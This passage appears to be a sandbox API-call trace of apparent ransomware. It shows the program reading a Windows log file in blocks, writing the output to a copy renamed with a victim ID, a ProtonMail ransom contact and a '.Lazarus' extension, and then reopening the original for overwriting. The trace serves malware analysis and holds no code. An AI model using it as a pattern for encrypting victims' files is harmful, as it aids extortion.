Size=0xb8) returned 0x5a6b8 [0059.599] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x8b218 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0059.599] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf90 [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cf00 [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7d040 [0059.599] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0059.599] GetLastError () returned 0x0 [0059.599] SetLastError (dwErrCode=0x0) [0059.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x8b218 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0059.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.599] GetLastError () returned 0x0 [0059.600] SetLastError (dwErrCode=0x0) [0059.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf60 [0059.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0059.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf40 [0059.600] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0059.600] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0059.600] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0059.600] CloseHandle (hObject=0x420) returned 1 [0059.600] AreFileApisANSI () returned 1 [0059.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0059.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.601] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.601] GetFileType (hFile=0x420) returned 0x1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0059.601] CloseHandle (hObject=0x420) returned 1 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0059.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0059.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0059.602] AreFileApisANSI () returned 1 [0059.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0059.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.602] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2)) returned 1 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0059.602] AreFileApisANSI () returned 1 [0059.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0059.602] GetLastError () returned 0x0 [0059.602] SetLastError (dwErrCode=0x0) [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e500 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0059.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0059.603] GetLastError () returned 0x0 [0059.603] SetLastError (dwErrCode=0x0) [0059.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a30 [0059.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0059.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0059.603] AreFileApisANSI () returned 1 [0059.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 120 [0059.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf0) returned 0x31cd0 [0059.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x31cd0, cchWideChar=120 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 120 [0059.603] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.604] GetFileType (hFile=0x420) returned 0x1 [0059.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0059.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0059.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0059.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x38) returned 0x78050 [0059.604] AreFileApisANSI () returned 1 [0059.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0059.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.604] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.605] GetFileType (hFile=0x424) returned 0x1 [0059.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0059.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0059.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.605] GetLastError () returned 0x0 [0059.605] SetLastError (dwErrCode=0x0) [0059.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.605] GetLastError () returned 0x0 [0059.605] SetLastError (dwErrCode=0x0) [0059.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0059.606] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0059.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0059.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0059.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c220 [0059.607] GetLastError () returned 0x0 [0059.607] SetLastError (dwErrCode=0x0) [0059.608] GetLastError () returned 0x0 [0059.608] SetLastError (dwErrCode=0x0) [0059.608] GetLastError () returned 0x0 [0059.608] SetLastError (dwErrCode=0x0) [0059.608] GetLastError () returned 0x0 [0059.608] SetLastError (dwErrCode=0x0) [0059.608] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.611] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.612] GetLastError () returned 0x0 [0059.612] SetLastError (dwErrCode=0x0) [0059.612] GetLastError () returned 0x0 [0059.612] SetLastError (dwErrCode=0x0) [0059.612] GetLastError () returned 0x0 [0059.613] SetLastError (dwErrCode=0x0) [0059.613] GetLastError () returned 0x0 [0059.613] SetLastError (dwErrCode=0x0) [0059.613] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.614] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.614] GetLastError () returned 0x0 [0059.614] SetLastError (dwErrCode=0x0) [0059.614] GetLastError () returned 0x0 [0059.614] SetLastError (dwErrCode=0x0) [0059.614] GetLastError () returned 0x0 [0059.614] SetLastError (dwErrCode=0x0) [0059.614] GetLastError () returned 0x0 [0059.614] SetLastError (dwErrCode=0x0) [0059.614] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.616] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.616] GetLastError () returned 0x0 [0059.616] SetLastError (dwErrCode=0x0) [0059.616] GetLastError () returned 0x0 [0059.616] SetLastError (dwErrCode=0x0) [0059.616] GetLastError () returned 0x0 [0059.616] SetLastError (dwErrCode=0x0) [0059.616] GetLastError () returned 0x0 [0059.616] SetLastError (dwErrCode=0x0) [0059.616] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.619] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.619] GetLastError () returned 0x0 [0059.619] SetLastError (dwErrCode=0x0) [0059.619] GetLastError () returned 0x0 [0059.619] SetLastError (dwErrCode=0x0) [0059.620] GetLastError () returned 0x0 [0059.620] SetLastError (dwErrCode=0x0) [0059.620] GetLastError () returned 0x0 [0059.620] SetLastError (dwErrCode=0x0) [0059.620] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.620] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.620] GetLastError () returned 0x0 [0059.620] SetLastError (dwErrCode=0x0) [0059.620] GetLastError () returned 0x0 [0059.620] SetLastError (dwErrCode=0x0) [0059.621] GetLastError () returned 0x0 [0059.621] SetLastError (dwErrCode=0x0) [0059.621] GetLastError () returned 0x0 [0059.621] SetLastError (dwErrCode=0x0) [0059.621] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.621] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.621] GetLastError () returned 0x0 [0059.621] SetLastError (dwErrCode=0x0) [0059.621] GetLastError () returned 0x0 [0059.621] SetLastError (dwErrCode=0x0) [0059.622] GetLastError () returned 0x0 [0059.622] SetLastError (dwErrCode=0x0) [0059.622] GetLastError () returned 0x0 [0059.622] SetLastError (dwErrCode=0x0) [0059.622] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.622] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.622] GetLastError () returned 0x0 [0059.622] SetLastError (dwErrCode=0x0) [0059.622] GetLastError () returned 0x0 [0059.622] SetLastError (dwErrCode=0x0) [0059.622] GetLastError () returned 0x0 [0059.622] SetLastError (dwErrCode=0x0) [0059.623] GetLastError () returned 0x0 [0059.623] SetLastError (dwErrCode=0x0) [0059.623] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.623] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.623] GetLastError () returned 0x0 [0059.623] SetLastError (dwErrCode=0x0) [0059.623] GetLastError () returned 0x0 [0059.623] SetLastError (dwErrCode=0x0) [0059.623] GetLastError () returned 0x0 [0059.623] SetLastError (dwErrCode=0x0) [0059.623] GetLastError () returned 0x0 [0059.623] SetLastError (dwErrCode=0x0) [0059.624] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0059.624] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.624] GetLastError () returned 0x0 [0059.624] SetLastError (dwErrCode=0x0) [0059.624] GetLastError () returned 0x0 [0059.624] SetLastError (dwErrCode=0x0) [0059.624] GetLastError () returned 0x0 [0059.624] SetLastError (dwErrCode=0x0) [0059.624] GetLastError () returned 0x0 [0059.624] SetLastError (dwErrCode=0x0) [0059.624] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x6b2, lpOverlapped=0x0) returned 1 [0059.625] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.625] GetLastError () returned 0x0 [0059.625] SetLastError (dwErrCode=0x0) [0059.625] ReadFile (in: hFile=0x424, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0059.625] GetLastError () returned 0x0 [0059.625] SetLastError (dwErrCode=0x0) [0059.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cf90 [0059.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0059.625] GetLastError () returned 0x0 [0059.625] SetLastError (dwErrCode=0x0) [0059.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0059.625] WriteFile (in: hFile=0x420, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327ef70*=0x6c0, lpOverlapped=0x0) returned 1 [0059.626] GetLastError () returned 0x0 [0059.626] SetLastError (dwErrCode=0x0) [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.626] GetLastError () returned 0x0 [0059.626] SetLastError (dwErrCode=0x0) [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0059.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c220 | out: hHeap=0x20000) returned 1 [0059.626] CloseHandle (hObject=0x420) returned 1 [0059.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.629] CloseHandle (hObject=0x424) returned 1 [0059.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0059.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0059.629] AreFileApisANSI () returned 1 [0059.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0059.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.629] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.633] GetFileType 